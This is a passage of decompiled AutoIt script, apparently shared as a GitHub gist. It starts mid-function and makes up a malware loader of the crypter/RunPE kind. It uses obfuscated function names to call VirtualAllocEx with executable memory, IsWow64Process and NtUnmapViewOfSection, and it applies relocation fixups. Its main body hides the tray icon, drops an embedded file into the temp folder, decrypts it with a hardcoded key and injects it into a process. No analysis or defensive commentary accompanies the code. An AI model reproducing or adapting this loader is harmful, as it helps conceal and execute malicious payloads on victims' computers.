$56 = Execute( ($55 - 8) / 2")) | |
$57 = Execute( DllStructCreate("word[" & $56 & "]", DllStructGetPtr($53) + 8)")) | |
For $I = 1 To $56 | |
$58 = Execute( DllStructGetData($57, 1, $i)")) | |
If BitShift($58, 12) = $60 Then | |
$59 = Execute( DllStructCreate("ptr", $37 + $42 + BitAND($58, 0xFFF))")) | |
Execute(DllStructSetData($59, 1, DllStructGetData($59, 1) + $50)")) | |
EndIf | |
Next | |
$54 += Execute( $55")) | |
WEnd | |
Return 1 | |
EndFunc | |
Func _REALLY_FFFFFAXX($11, $51) | |
Local $10 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $11, "ptr", 0, "dword_ptr", $51, "dword", 12288, "dword", 64) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
Return $10[0] | |
EndFunc | |
Func _FVSDHUWEUGWEUIGHW325235235C($11) | |
Local $10 = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $11, "bool*", 0) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
Return $10[2] | |
EndFunc | |
Func _CALIBAN($11, $61) | |
DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $11, "ptr", $61) | |
If @error Then Return SetError(1, 0, 0) | |
Return 1 | |
EndFunc | |
#NoTrayIcon | |
FileDelete(@TempDir & "\no.edu") | |
FileDelete(@TempDir & "\no.edu") | |
FileInstall("no.edu", @TempDir & "\no.edu", 1) | |
$ITSAPARTY = FileRead(@TempDir & "\no.edu") | |
Global $PUSES | |
$PUSES = _6($ITSAPARTY, "c4c6^5v8P2F1V5s8", "26114") | |
$EWTEWTWET = _PNP23($PUSES, @ScriptFullPath) | |
; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.11 build(180) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment